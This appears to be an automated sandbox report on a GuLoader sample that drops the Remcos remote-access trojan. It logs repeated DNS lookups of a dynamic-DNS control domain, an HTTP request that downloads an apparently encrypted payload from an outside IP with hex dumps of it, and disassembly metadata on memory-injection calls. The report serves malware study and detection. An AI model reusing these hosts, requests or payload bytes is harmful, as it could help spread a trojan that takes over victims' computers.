Aug 3, 2021 19:07:21.735933065 CEST	8.8.8.8	192.168.2.3	0xba29	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:23.916037083 CEST	8.8.8.8	192.168.2.3	0x412d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:26.126003981 CEST	8.8.8.8	192.168.2.3	0xee6f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:28.345453024 CEST	8.8.8.8	192.168.2.3	0x2238	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:30.567393064 CEST	8.8.8.8	192.168.2.3	0x26fd	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:32.802838087 CEST	8.8.8.8	192.168.2.3	0x7e26	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:35.040189981 CEST	8.8.8.8	192.168.2.3	0xeb55	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:37.239572048 CEST	8.8.8.8	192.168.2.3	0xa36	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:39.415898085 CEST	8.8.8.8	192.168.2.3	0x1bcf	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:41.625711918 CEST	8.8.8.8	192.168.2.3	0x30fb	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:43.823787928 CEST	8.8.8.8	192.168.2.3	0xd400	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:46.009243011 CEST	8.8.8.8	192.168.2.3	0xf1d3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:48.245440960 CEST	8.8.8.8	192.168.2.3	0xeebb	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:50.439282894 CEST	8.8.8.8	192.168.2.3	0x55eb	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:52.736202002 CEST	8.8.8.8	192.168.2.3	0x9b87	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:54.935384989 CEST	8.8.8.8	192.168.2.3	0x8cea	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:57.142123938 CEST	8.8.8.8	192.168.2.3	0xbf11	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:59.324852943 CEST	8.8.8.8	192.168.2.3	0x1642	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:08:01.529334068 CEST	8.8.8.8	192.168.2.3	0x6602	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:08:03.731192112 CEST	8.8.8.8	192.168.2.3	0x2043	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

101.99.94.119

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49736	101.99.94.119	80	C:\Users\user\Desktop\pRcHGlVekw.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 19:01:31.451909065 CEST	6019	OUT	GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 101.99.94.119 Cache-Control: no-cache
Aug 3, 2021 19:01:31.500464916 CEST	6020	IN	HTTP/1.1 200 OK Date: Tue, 03 Aug 2021 17:01:31 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Mon, 02 Aug 2021 21:02:57 GMT ETag: "72840-5c899e4c3da73" Accept-Ranges: bytes Content-Length: 469056 Content-Type: application/octet-stream Data Raw: 31 79 a2 69 b5 67 ac a3 66 68 89 94 04 1b b4 8f c9 36 a1 00 58 5a db 92 66 6d cc 77 0a bf 4e 76 be cb df 4e 9d df 64 5e 44 ed 21 f3 cf f9 7d 62 b4 1b 44 fc 1e d1 54 51 7a 33 c1 4c df e6 15 ab fc 9f 41 d1 41 8f 51 31 14 c8 d8 11 ba 23 86 c1 35 93 9d fc 44 9e 32 ca a0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 21 67 d6 a5 5b 6f 63 6f 44 5d 92 7d a4 66 fa 44 00 3d 71 d6 5c 03 88 d7 97 a0 3d f6 3d 55 3c 74 0e f3 18 b3 74 b0 8f 9b fc 7f 70 16 c6 64 54 6e 65 de 18 f0 d3 5c bc 13 45 22 ac 24 20 7e 82 b9 70 76 a4 7d 01 f7 d5 61 be 6f 06 f4 2c 87 a6 b3 20 b2 ad 40 2e d1 2f 53 60 03 72 48 d8 a8 33 13 0a f2 ff d2 dd 78 63 a0 8b 27 17 28 0e 60 82 f6 72 ae 94 e0 7b d9 7f 8e c3 dd 64 b8 7a 3f 9c de 07 ce e8 0f a5 e2 f6 89 60 01 25 fd 8a 32 fc 79 07 a7 ab df eb 97 4a 2c 9a 34 91 22 ae 83 f5 10 09 71 2b 83 86 cf 6e c1 fd 78 9b ff 23 b1 96 1b 1e b1 63 5b 3d 90 ef 89 7e 8a 22 4d e5 54 77 c8 44 5a ca a4 4c 7d b5 c0 fc c0 dd 2e 18 32 28 dd ca 3a 96 9c 05 f0 1c 01 92 09 ad 55 8b 34 03 76 7c 2a c7 57 01 af c3 92 f4 fe a1 46 ae cb 12 c4 67 bb f2 9c 4b c8 90 cb 0b 36 3d a2 cf d6 65 cd 91 6d 1a 7b b3 ae 5d b5 71 0a 24 46 d2 95 ab 70 f8 9c 0c 0f 55 c2 c0 0c ed 95 d2 b5 e3 48 48 bc f0 3e 3a 82 e8 91 28 22 11 91 fd 50 31 d0 48 57 96 73 6f 6f ab 25 0c 11 ac 70 08 53 83 83 3f b8 3e c5 49 ba 0a e0 6c cd 20 3a db 77 67 8e fb 36 1e cb 1f 01 03 9a 71 8e 49 ed 61 2c 69 21 ad ce f9 ee ff ec 84 8e 6d 86 db b8 3f b7 03 e2 7f 24 ba 8c 67 c8 40 b0 eb df 8a b4 91 9b 4f 28 1a 3b 00 71 28 06 b7 a3 84 fa b2 23 5c 4c 76 b9 6d c0 ea b6 ba 5f 07 9a 82 96 5b b9 53 9d 33 fd 1b e9 51 5d 11 32 aa ab 37 a4 e9 e4 ed 8f 5f a9 dd 16 e8 f1 02 6d 5d 93 67 0b b1 97 41 ba 80 65 d4 cc ba 7e b1 6e be 4b 0a b7 2c 68 50 ad 15 84 32 c1 47 3e 78 a2 f0 ac 5e f6 53 15 d2 d0 93 e0 68 65 1c ab 21 69 d6 3b e3 69 9c 2b 10 57 7b 25 d8 99 a9 23 1e 80 6a 8b d0 4c c9 98 5f 04 ad 20 6e 20 e0 d4 86 3d d5 78 c0 63 00 93 0d 76 4f fd ab d5 50 53 0c fd ae b8 f8 84 03 9c dc 98 09 3d 1f 8f 80 de 9c d3 a6 97 0b fa 1a 66 11 63 4d 31 1f 06 d7 7e 4c ea b2 0d 17 00 0e 9f e1 20 97 00 06 32 b2 d4 a3 8a ef 7a 40 7f dd 0c 11 b7 be c1 20 e1 bb 88 08 d8 e9 42 02 00 36 78 93 28 da 41 52 f9 96 9e c3 54 a2 68 b6 e1 93 f8 b8 d3 15 6d 42 73 42 64 ce 30 64 40 c6 a3 ef ed a2 d8 77 ce b3 d0 4e 87 51 cd 57 42 a7 9e 1f fa 7c 71 00 a0 0e f5 10 6a ff 84 ee f7 d2 d0 7f 20 ec 19 ab 75 73 9c 02 41 31 3d 88 d3 19 ed 16 29 30 07 c6 5c c1 5b bd a4 4b 02 bc c6 24 24 f2 cb 2e 0a a2 1f a2 53 16 ba b6 66 85 70 87 87 55 7d 12 44 66 c1 b9 46 4e 1e a0 dc 7a e0 ca 8e 6e f8 1e 4b 3f 65 f2 b4 35 8e 12 2c b3 7e 16 04 83 d2 5c fc e9 9c 64 d2 98 66 e9 42 4b 0b ac c1 11 2d 8f b1 c5 d1 d1 42 8f 51 31 10 c8 d8 11 45 dc 86 c1 8d 93 9d fc 44 9e 32 ca e0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 31 66 d6 a5 55 70 d9 61 44 e9 9b b0 85 de fb 08 cd 1c 25 be 35 70 a8 a7 e5 cf 5a 84 5c 38 1c 17 6f 9d 76 dc 00 90 ed fe dc 0d 05 78 e6 0d 3a 4e 21 91 4b d0 be 33 d8 76 6b 2f a1 2e 04 7e 82 b9 70 76 a4 7d ab 74 97 51 50 8d 2a 97 c2 65 8a Data Ascii: 1yigfh6XZfmwNvNd^D!}bDTQz3LAAQ1#5D2s7EIc?;Vs_q!g[ocoD]}fD=q\==U<ttpdTne\E"$ ~pv}ao, @./S`rH3xc'(`r{dz?`%2yJ,4"q+nx#c[=~"MTwDZL}.2(:U4v\|WFgK6=em{]q$FpUHH>:("P1HWsoo%pS?>Il :wg6qIa,i!m?$g@O(;q(#\Lvm_[S3Q]27_m]gAe~nK,hP2G>x^She!i;i+W{%#jL_ n =xcvOPS=fcM1~L 2z@ B6x(ARThmBsBd0d@wNQWB\|qj usA1=)0\[K$$.SfpU}DfFNznK?e5,~\dfBK-BQ1ED2s7EIc?;Vs_q1fUpaD%5pZ\8ovx:N!K3vk/.~pv}tQPe
Aug 3, 2021 19:01:31.500549078 CEST	6022	IN	Data Raw: d0 ce 50 81 23 74 af f2 30 9c e1 5e 2b 82 d6 ec 70 45 10 d3 b1 87 06 bd c3 7b c5 3b 4b e9 fa 2a 95 9d 4c b8 83 0b 9b 94 ed 2f 3f 48 db af 83 b3 bc f3 2c c4 6c 70 5e df eb b4 e3 09 9e 5f 37 34 db 8d 45 6f df 03 0d f5 27 16 f1 f8 41 a8 b8 3c 71 f8 Data Ascii: P#t0^+pE{;KL/?H,lp^_74Eo'A<qY/_e_S.R=?Zm9,kZxWEU64r?sGEg]z+<6="yy"F:p()S%}>/JPU*`/
Aug 3, 2021 19:01:31.500612020 CEST	6023	IN	Data Raw: 5e df 1d 06 8e 33 f3 2a 03 4b 17 e8 9b 74 e3 20 ff ac 2f 77 f2 3c 5e 95 c3 0e 75 cf 11 c0 dd 7b 7b 0d ec 2d 77 a4 c2 14 25 8c 57 8b da 6f d0 38 d9 81 02 06 e3 92 3c 21 aa 80 aa f1 d0 f8 3b d7 37 57 e7 4f ad fb 45 75 44 41 06 f3 10 68 a8 27 02 c2 Data Ascii: ^3*Kt /w<^u{{-w%Wo8<!;7WOEuDAh'[WNN]JqM<$qtr-iJalSgPMa({`7J_<_":LADE6a30q^'-PZM!#Jal"54C
Aug 3, 2021 19:01:31.500654936 CEST	6024	IN	Data Raw: 2c da 55 4a 09 01 ea 4d aa de cb 63 df 51 7c c2 1f aa fe 50 40 af 88 25 e5 47 5a bf 00 4f ac 49 8a b3 4b c2 11 27 1b 88 f1 18 e5 21 ec 31 1a b6 bf de 16 3b b0 50 5e 0a 64 c5 3e 9d 26 34 dc b6 87 c3 00 2a 7b 0a ed 95 b8 d4 6d 83 a1 d5 c0 3e 3a 23 Data Ascii: ,UJMcQ\|P@%GZOIK'!1;P^d>&4*{m>:#i"Q6whl!W`;IT(mw2LWB(/avy?Eqxw@g#rC[(Bcq+N7Cwd7}[\|G9B+LqX
Aug 3, 2021 19:01:31.546262026 CEST	6026	IN	Data Raw: 08 36 f9 43 55 37 3f 1f df c6 91 44 4a e6 6c 2f 7d 7a d9 b6 ed c6 a0 72 85 55 2d 45 cf a9 13 54 44 4e f0 f6 34 cc f1 ca 8e 37 a1 9a 8b 4b 42 a4 39 30 86 99 a5 e3 96 82 07 83 d2 d7 0c 62 57 e9 97 64 36 01 86 48 0b ac 3e 27 a6 40 4e f5 39 76 53 8f Data Ascii: 6CU7?DJl/}zrU-ETDN47KB90bWd6H>'@N9vSQo3D1vsEE\\|a!KQ9X=;Vp$Z x1@Gc%`DZ{)0JivWS6OFUpk/*Z#@pUPIEtV4+F:L{k
Aug 3, 2021 19:01:31.546298027 CEST	6027	IN	Data Raw: e2 02 86 7d 30 90 d3 96 a2 6e c2 0a a6 74 22 c4 de 92 f3 27 50 dc 4a fc 1d f4 ec 52 13 64 c8 40 bb 67 11 ea f7 92 9b 7f bb 69 37 b3 bf ef 06 b8 a3 84 fa 5a 65 59 4c 76 e7 e6 25 b7 74 b2 5f 2b a9 87 96 43 32 53 5e 0e 1a f1 bf 9a ac f9 e9 57 54 c8 Data Ascii: }0nt"'PJRd@gi7ZeYLv%t_+C2S^WT/odX~FgZNGt.Y`KqXAFxa>#8Wvj+@dv(-gpK=k_UK^F{W\|M=\BZv(]6(Y
Aug 3, 2021 19:01:31.546320915 CEST	6028	IN	Data Raw: 76 f5 5f fa 64 39 ed 19 9e 93 02 81 89 3a 17 64 4f bc ee 88 1b 46 d3 cd 43 cd 8f 57 2c 2a 30 6a d2 b4 f9 1f 17 6f 76 47 5c 7d 9c ed 8a c3 8e fb 68 95 17 b1 81 c9 4e b3 2f 41 b8 17 fd 6b 14 51 21 46 b8 d2 d3 71 9e c3 87 54 8b 7c 5d d5 7b 5f 9d 94 Data Ascii: v_d9:dOFCW,0jovG\}hN/AkQ!FqT\|]{_E8P#Y?!v@,NKS6/?D5%z&T;s4a.EX~@5wU6t/YdpO/`J?s>(A~J#]":oA
Aug 3, 2021 19:01:31.546341896 CEST	6030	IN	Data Raw: d8 48 3a 38 05 0f 92 9a 76 af 4b 69 3e 64 11 6b 9c e7 45 dc 97 74 27 ec 75 cb a8 13 bb 06 3f e5 55 ae 5f 04 25 7c bd 62 db 26 0e 75 2a 07 87 a9 8b 4c 83 93 12 3e fe 5e bc 39 0e 02 db b4 07 f1 4b 74 c1 30 d8 a6 fd 3f ed 83 5e db fa ff 80 16 70 c7 Data Ascii: H:8vKi>dkEt'u?U_%\|b&uL>^9Kt0?^pAj?MS] ~&2Kl,U<-}h6Arz`hYyR_ZmzH/4+WW,rus;CA$LXh@Hw#t_Cz4l/Rl@4
Aug 3, 2021 19:01:31.546359062 CEST	6031	IN	Data Raw: 5b 56 1c d3 3b e7 b6 00 82 29 b0 e3 5c 15 b3 dd 82 4c 40 b4 6f 64 e2 f2 0a c4 1c de 36 59 7b be af 52 73 5c ef de 0b 8c b4 9a 74 ee a1 f6 5e 5a ce b6 19 cb ba c7 bb a8 01 9f 99 3b 85 e0 5f c2 e1 5f 55 e7 b8 9c 11 bf b1 c0 a9 4b 31 7f 4e bf 6d c9 Data Ascii: [V;)\L@od6Y{Rs\t^Z;__UK1NmA(9"L+!(O=m{5J=!ghJ5&=vP:HI}{2eL#cPa]?hE[k/>to0)kJw 8\.87q1
Aug 3, 2021 19:01:31.546380997 CEST	6032	IN	Data Raw: d7 25 ca 0f ed 1d 55 4a 11 ae 9f 67 6a d3 73 68 38 ec 31 ee 15 a0 b3 ce 30 54 69 83 ab c4 da 2d 9d 63 f1 6c a3 6d 49 dc 03 bf fa 4e 61 e0 f9 39 79 8b 6e 0d 32 00 82 54 2d 3f 7a a2 e7 14 23 2f 49 3b 5d ae 63 fd c2 f2 31 03 da 15 66 16 a0 f1 04 05 Data Ascii: %UJgjsh810Ti-clmINa9yn2T-?z#/I;]c1fW8>99P\|~B&2y\|&1rpw#Y#yKWfFjXhg(9S#em.Fo\4HcX+cc~}B9Zumu25O
Aug 3, 2021 19:01:31.546401978 CEST	6034	IN	Data Raw: 38 0e f0 7d ce b0 7d 95 f5 9b 45 15 d5 43 1f 20 61 f3 e6 4c c3 c1 0c d6 4d a1 8b b5 c3 87 54 5f da c5 7d eb 44 3b a9 df c5 15 f4 d5 2f b7 54 53 23 87 b0 73 da e3 92 68 6c 83 9d 7c f6 37 50 b1 31 b6 45 09 27 e7 03 33 7f d7 27 8f 0c 1f c9 e1 c8 d8 Data Ascii: 8}}EC aLMT_}D;/TS#shl\|7P1E'3'a}et"ly$<:(d:,Osi$ylVXF?qH8Qfyn.wFt:YR+313m}`G/DFKtJVP@[]PjkK)SWvV

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: pRcHGlVekw.exe PID: 3164 Parent PID: 5640

General

Start time:	18:59:30
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\pRcHGlVekw.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\pRcHGlVekw.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	D2CB32F7C7F384B4BAA8DD13D6B5BBAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: pRcHGlVekw.exe PID: 1724 Parent PID: 3164

General

Start time:	19:00:28
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\pRcHGlVekw.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\pRcHGlVekw.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	D2CB32F7C7F384B4BAA8DD13D6B5BBAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: pRcHGlVekw.exe PID: 3164 Parent PID: 5640 pRcHGlVekw.exeCOMMON

Executed Functions

Function 02180E63, Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1230libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 021859E6: NtAllocateVirtualMemory.NTDLL ref: 02185C3F

LoadLibraryA.KERNELBASE(?,654203E4,?,02188072,021804FC,-32C745D8,1FFAC1AA,-8DFEB28D,6F01E8AF,C2E03886,9BF726CB), ref: 02187688

Strings

C50, xrefs: 02181021
Sl, xrefs: 02180C3D
%j, xrefs: 02180B26
e], xrefs: 02180CDA
zge5, xrefs: 02180FC8
|Jm7, xrefs: 021875C4
%p), xrefs: 0218796A

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: %p)$C50$zge5$|Jm7$%j$Sl$e]
API String ID: 2616484454-1889308309
Opcode ID: d995d619b5ee7fe7ce39e76135da40b18995261c699f8a75005878e4586c2476
Instruction ID: 8717010f3132a81ca31393d724868a968dd62df84d96573ff34dea9ba6f1bbd3
Opcode Fuzzy Hash: d995d619b5ee7fe7ce39e76135da40b18995261c699f8a75005878e4586c2476
Instruction Fuzzy Hash: 6FA22271A443899FDB78EE388C89BEAB7E2AF59310F15412EEC4DEB211D7318945CB05

Uniqueness

Uniqueness Score: -1.00%

Function 02181766, Relevance: 16.8, APIs: 1, Strings: 8, Instructions: 1093COMMON

Download Yara Rule

Strings

Sl, xrefs: 02180C3D
.g, xrefs: 02184B89
%j, xrefs: 02180B26
S,2, xrefs: 02184EAE
e], xrefs: 02180CDA
4gF, xrefs: 02184976
9#S_, xrefs: 02184F0D
UV3, xrefs: 021849E4

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UV3$4gF$9#S_$S,2$%j$Sl$e]$.g
API String ID: 0-3763713938
Opcode ID: 0f5d5bd086797c6930fa03a6b460126f2aea1a510d23e326712219b44bfa9769
Instruction ID: c83201a8941c6ccae41c466dc212eabe1f9294fffa14372f745ca86234a16368
Opcode Fuzzy Hash: 0f5d5bd086797c6930fa03a6b460126f2aea1a510d23e326712219b44bfa9769
Instruction Fuzzy Hash: 0EA21FB26443899FDB75AF38CC957EA7BA2FF55300F55412EEC899B210D7309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02185564, Relevance: 12.9, APIs: 2, Strings: 5, Instructions: 676COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-0000000100000001,2023FB39), ref: 021855E5

Strings

.g, xrefs: 02184B89
S,2, xrefs: 02184EAE
4gF, xrefs: 02184976
9#S_, xrefs: 02184F0D
UV3, xrefs: 021849E4

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: UV3$4gF$9#S_$S,2$.g
API String ID: 560597551-377649312
Opcode ID: 166b979d95a22ef23e3b2b1b12240f3aa5b39cff93707da851e4c711135f252b
Instruction ID: 9f33d4a71b51855d2c84ab4cbe16e2c9bc438c5221d27b40c1598b60eb681272
Opcode Fuzzy Hash: 166b979d95a22ef23e3b2b1b12240f3aa5b39cff93707da851e4c711135f252b
Instruction Fuzzy Hash: 5652ECB26003899FDB759F38CD95BEABBB2FF55340F51422EEC499B210D7309A818B45

Uniqueness

Uniqueness Score: -1.00%

Function 02183DA0, Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 729COMMON

Download Yara Rule

Strings

.g, xrefs: 02184B89
S,2, xrefs: 02184EAE
4gF, xrefs: 02184976
9#S_, xrefs: 02184F0D
UV3, xrefs: 021849E4

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UV3$4gF$9#S_$S,2$.g
API String ID: 0-377649312
Opcode ID: 604a5f6329d1cf4feabb5c6f918d04220b4d50815dd2b706c364146660f928e2
Instruction ID: 6acdbb707ca2282bc1d006e7be00a56ea75268fe3b0fe52d4d20324b5f9638dc
Opcode Fuzzy Hash: 604a5f6329d1cf4feabb5c6f918d04220b4d50815dd2b706c364146660f928e2
Instruction Fuzzy Hash: BE62DBB26003899FDB659F35CD94BEABBB2FF55340F55822ADC899B210D7309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0218435F, Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 678nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02187550: LoadLibraryA.KERNELBASE(?,654203E4,?,02188072,021804FC,-32C745D8,1FFAC1AA,-8DFEB28D,6F01E8AF,C2E03886,9BF726CB), ref: 02187688

NtWriteVirtualMemory.NTDLL(?,1FCAF8AA,?,00000000,?,?,?,?,A89990A4), ref: 021850FB

Strings

.g, xrefs: 02184B89
S,2, xrefs: 02184EAE
4gF, xrefs: 02184976
9#S_, xrefs: 02184F0D
UV3, xrefs: 021849E4

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UV3$4gF$9#S_$S,2$.g
API String ID: 3569954152-377649312
Opcode ID: 227238b68f9f4b9a72ee3f1a504114d5ebcd1b3b11e5cf3aa2e91feca0d4f957
Instruction ID: 5f2876e18e453d5434cfa6a2eb1838d9cf075a865d23e8a248def4fd625bc43d
Opcode Fuzzy Hash: 227238b68f9f4b9a72ee3f1a504114d5ebcd1b3b11e5cf3aa2e91feca0d4f957
Instruction Fuzzy Hash: 8152EBB26403899FDB759F34CD95BEABBB2FF55340F41822DEC899B210D7309A818B45

Uniqueness

Uniqueness Score: -1.00%

Function 021846AC, Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 559nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,1FCAF8AA,?,00000000,?,?,?,?,A89990A4), ref: 021850FB

Strings

.g, xrefs: 02184B89
S,2, xrefs: 02184EAE
4gF, xrefs: 02184976
9#S_, xrefs: 02184F0D
UV3, xrefs: 021849E4

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UV3$4gF$9#S_$S,2$.g
API String ID: 3527976591-377649312
Opcode ID: 72a71178c91990101a4be5200b6ac261919d3e164b56abcfe37accea0072a36c
Instruction ID: 3297c42ccafc48b1d6235274b21a59e612eb3a07a768684847fc6ad21a10e87f
Opcode Fuzzy Hash: 72a71178c91990101a4be5200b6ac261919d3e164b56abcfe37accea0072a36c
Instruction Fuzzy Hash: 6D32FBB26403899FDB759F39CD95BDABBB2FF95300F51822ED8499B210D7309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0218486E, Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 528nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,1FCAF8AA,?,00000000,?,?,?,?,A89990A4), ref: 021850FB

Strings

.g, xrefs: 02184B89
S,2, xrefs: 02184EAE
4gF, xrefs: 02184976
9#S_, xrefs: 02184F0D
UV3, xrefs: 021849E4

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UV3$4gF$9#S_$S,2$.g
API String ID: 3527976591-377649312
Opcode ID: a41f13b3eda1199bd591e638632425fcb40a32632527b09cdc3a9ed30032cdd8
Instruction ID: 118efe9124ab20b904845d94ea32aad91130f4e5507e3fba739ef379b4a01502
Opcode Fuzzy Hash: a41f13b3eda1199bd591e638632425fcb40a32632527b09cdc3a9ed30032cdd8
Instruction Fuzzy Hash: A8220FB16002899FDBA9DE35DD89BDBBBE2FF69300F44412ED8499B310E7708A41CB44

Uniqueness

Uniqueness Score: -1.00%

Function 02189695, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 410COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 02189A28

Strings

Sl, xrefs: 02180C3D
%j, xrefs: 02180B26
e], xrefs: 02180CDA
a2O1, xrefs: 02189930
]Faz, xrefs: 02189902

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID: ]Faz$a2O1$%j$Sl$e]
API String ID: 2335996259-577786325
Opcode ID: b5ab0ebc8619fa49ffa6d4ebd90734546a9218d8e15d427131d1f7c896a108d9
Instruction ID: 616aa75ee77120d2560a56f3ed79410f0c1266006a2b0067b6ecba2560a119b5
Opcode Fuzzy Hash: b5ab0ebc8619fa49ffa6d4ebd90734546a9218d8e15d427131d1f7c896a108d9
Instruction Fuzzy Hash: 4CF12E71A443898FDB34EF28CC947EA7BE2AF59340F51812AEC49AB354D7319A85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 02182EC2, Relevance: 9.6, Strings: 7, Instructions: 807COMMON

Download Yara Rule

Strings

6%L), xrefs: 02183459
D"wK, xrefs: 02182F4E
Sl, xrefs: 02180C3D
%j, xrefs: 02180B26
e], xrefs: 02180CDA
vQ, xrefs: 02183509
%p), xrefs: 0218796A

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: %p)$6%L)$D"wK$vQ$%j$Sl$e]
API String ID: 1029625771-454628589
Opcode ID: ade017cac6bf6b4a49d43fb1c2b86fa5f6d2d52806ec4a80e2c29e843cbfb8b9
Instruction ID: bf5fdf90a03caf05233f55d7f30d73c60786f60c490c855738bf34abaac48fc3
Opcode Fuzzy Hash: ade017cac6bf6b4a49d43fb1c2b86fa5f6d2d52806ec4a80e2c29e843cbfb8b9
Instruction Fuzzy Hash: 5E72BF71A443899FDB64EF28CC80BDAB7E2BF49350F15422AEC589B300D734AA45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0218561A, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 374COMMON

Download Yara Rule

Strings

Sl, xrefs: 02180C3D
%j, xrefs: 02180B26
e], xrefs: 02180CDA
|Jm7, xrefs: 021875C4

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: AllocateCreateFileMemoryVirtual
String ID: |Jm7$%j$Sl$e]
API String ID: 2773895085-1093994527
Opcode ID: 6e7ec88c0d93e7a9d8ebcd213f2ce7c5de3d16edd4e49bfc4da80fc11ead2782
Instruction ID: c0e38483646777a297bc4a0b4f76f70bb00f07e5288543abdcd811ca63449176
Opcode Fuzzy Hash: 6e7ec88c0d93e7a9d8ebcd213f2ce7c5de3d16edd4e49bfc4da80fc11ead2782
Instruction Fuzzy Hash: 51E100716442898FCB70FF28CC807EA77E6AF59350F55452AEC88EB240D7309A85CF52

Uniqueness

Uniqueness Score: -1.00%

